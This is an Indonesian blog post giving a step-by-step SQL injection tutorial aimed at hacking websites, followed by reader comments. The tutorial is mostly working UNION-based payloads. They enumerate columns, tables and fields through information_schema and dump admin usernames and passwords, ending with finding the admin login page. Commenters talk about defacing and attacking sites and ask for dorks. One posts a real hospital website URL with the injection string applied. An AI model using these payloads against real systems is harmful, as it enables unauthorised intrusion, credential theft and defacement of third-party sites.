Pasang iklan Anda di sini.
http://goo.gl/ad3AU2
> > > Cara Hacking Website Dengan Teknik SQL Injection

31 Cara Hacking Website Dengan Teknik SQL Injection

Selasa, Maret 13, 2012
Pengertian SQL InjectionSQL Injection adalah sebuah aksi hacking yang dilakukan diaplikasi client dengan cara memodifikasi perintah SQL yang ada dimemori aplikasi client dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.


Yang perlu diketahui sebelum melakukan SQL Injection pada MySQL:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: MySQL versi 5.x , tidak support untuk MySQL versi 4.x

[ Step 1 ]
  • Carilah target
    Misal: [site]/berita.php?id=100

    Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
    contoh:
    [site]/berita.php?id=100' atau
    [site]/berita.php?id=-100
    Sehingga muncul pesan error seperti berikut [ masih banyak lagi ]
[ Step 2 ]
  • Mencari dan menghitung jumlah table yang ada dalam databasenya...
    gunakan perintah: order by

    Contoh:

    [site]/berita.php?id=-100+order+by+1-- atau
    [site]/berita.php?id=-100+order+by+1/*

    Ceklah secara step by step (satupersatu)...
    Misal:

    [site]/berita.php?id=-100+order+by+1--
    [site]/berita.php?id=-100+order+by+2--
    [site]/berita.php?id=-100+order+by+3--
    [site]/berita.php?id=-100+order+by+4--

    Sehingga muncul error atau hilang pesan error...
    Misal: [site]/berita.php?id=-100+order+by+9--

    Berarti yang kita ambil adalah sampai angka 8
    Menjadi [site]/berita.php?id=-100+order+by+8--
[ Step 3 ]
  • untuk mengeluarkan angka berapa yang muncul gunakan perintah union
    karena tadi error sampai angka 9
    maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

    ok seumpama yg keluar angka 5

    gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
    misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
    [site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

    Lihat versi yang digunakan se'umpama versi 4 tinggalkan saja karena dalam versi 4 ini kita harus menebak sendiri table dan column yang ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

    Untuk versi 5 berarti anda beruntung tak perlu menebak table dan column seperti versi 4 karena di versi 5 ini bisa menggunakan perintah From+Information_schema..
[ Step 4 ]
  • Untuk menampilkan table yang ada pada web tersebut adalah
    perintah table_name >>> dimasukan pada angka yangg keluar tadi
    perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

    Code:

    [site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

    Se'umpama table yang muncul adalah "admin"
[ Step 5 ]
  • untuk menampilkan semua isi dari table tersebut adalah
    perintah group_concat(table_name) >>> dimasukan pada angka yang keluar tadi
    perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir

    [site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.​tables+where+table_schema=database()--
[ Step 6 ]
  • Perintah group_concat(column_name) >>> dimasukan pada angka yang keluar tadi
    perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir

    [site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema​.columns+where+table_name=0xhexa--

    Pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
    Website yg digunakan untuk konversi :

    http://www.v3n0m.net/ascii.htm

    Contoh kata yang ingin dikonversi yaitu admin maka akan menjadi 61646D696E

    [site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema​.columns+where+table_name=0x61646D696E--
[ Step 7 ]
  • Memunculkan apa yang tadi telah dikeluarkan dari table yaitu dengan cara

    perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
    perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

    Contoh :

    [site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

    Contoh kata yang keluar adalah id,username,password

    Contoh :

    [site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--
[ Step 8 ]
  • Tahap terakhir mencari halaman admin atau login.
Sekian postingan saya kali ini tentang Cara Hacking Website Dengan Teknik SQL Injection, tutorial hacking yang lain akan menyusul, Jadi mampir terus kesini ya :D

Source: 
Hacker Newbie



Artikel Terkait :

31 komentar:

M-aldy | Blogger Tutorial mengatakan...

Nah Akhirnya di post juga
ane langsung coba ahh
nice share om iqbal

Cirebon-Cyber4rt mengatakan...

M Aldy, okm silahkan dicermati ya :D

Alam Perwira mengatakan...

masih bingung mas dari dulu :'(

Bayu Rifai mengatakan...

WAHH,,ini to cara yang di pake temen ane,,
makasih sob infonya,,bermanfaat :)

Cirebon-Cyber4rt mengatakan...

Alam Perwira, hehee terus mencoba sob, harus step by step supaya ndak bingung :)

Bayu Rifai, iya gan, cara ini memeamng paling umum nuat nyari kelemahan sebuah website, ok sama-sama sob :)

Indramayu Cyber Team mengatakan...

ternyata sekarang sudah jadi defacer nih =))

Indramayu Cyber Team mengatakan...

ayoo kita serang web yuk, kalo ane lagi begadang lagi :D

Mania-Xp mengatakan...

manstab sob, izin bookmark. belum sempat baca, besok lagi ajadeh...

Bayu Rifai mengatakan...

Udah berapa Web yang ante Deface gan..hehe

absen,,

Sadeva Aldy Pratama mengatakan...

wah" bagus jg nih

Gigablog mengatakan...

cara cepat deface pake web folder ,kwakwak

MuhammadIbnuh mengatakan...

masih bingung, masih neuibi

dewadewi mengatakan...

Dak reti

iklanopobae mengatakan...

Aku suka artikelnya penasaran pgn tau software2 hacker

ViperGoy mengatakan...

Wah mantap nih gan tutorialnya
ijin coba dulu ya gan , nanti jika tidak bisa ane nanya ke agan oke? thx

Mr-X mengatakan...

makasih mas atas nfonya

DIEKY'S BLOG mengatakan...

terima kasih gan
sangat membantu tutor ini ^_^

Muhammad Adam Hasnan mengatakan...

Bagi Dorknya Dong

Rifaldi Ramanda mengatakan...

SQL ? wah.. paling ane ngak ngerti tuh ..v

udah belajar dari mana2 tetep aja ngak ngerti -_-
======
Tapi nice share gan..

Anonim mengatakan...

ane dah coba beberapa kali koq tetap nggak jadi ya>???http://www.sanglahhospitalbali.com/v1/berita.php?ID=-100+order+by+1-- smpe 10 koq palah sudah gak ada pesan errror? pdahal saat belum di order by ad.. apa cuma 1 table dalam database?? gak mungkin bnget kayaknya.. gmana gan?? mohon pencerahannya...

Anonim mengatakan...

ane aldo bang
abang jenius
tankyou

Anonim mengatakan...

saya coba pake teknik ini cman muncul 1 field data user n password aja. kl ingin dapat seluruh data pada table admin gmn code injectnya?

Pengobatan Asma Tradisional mengatakan...

nice share... sangat bermanfaat

Admin | Putra-Community | 14 mengatakan...

Thanks Info nya sobat blogger :-)
Izin Copas ya .. :-) terimakasih.

tokomap mengatakan...

penasaran nih bang

sepha setrumz mengatakan...

Broh, Tau HTML BLOG Buat Hacker Gak ?

cara pemesanan ace maxs mengatakan...

keren bgt bang, ane jdi mau nyoba ni

Pengobatan Benjolan Di payudara mengatakan...

Terimakasih banyak atas informasi yang telash disampaikannya

Anonim mengatakan...

arigatogozaimashu...

obat aman penurun kolesterol tinggi mengatakan...

terimakasih informasinya

Ralph Angelo mengatakan...

malah tulisan nya character_sets tapi klo di buka malah dpetnya unknown column ..

Poskan Komentar

Contact

Nama

Email *

Pesan *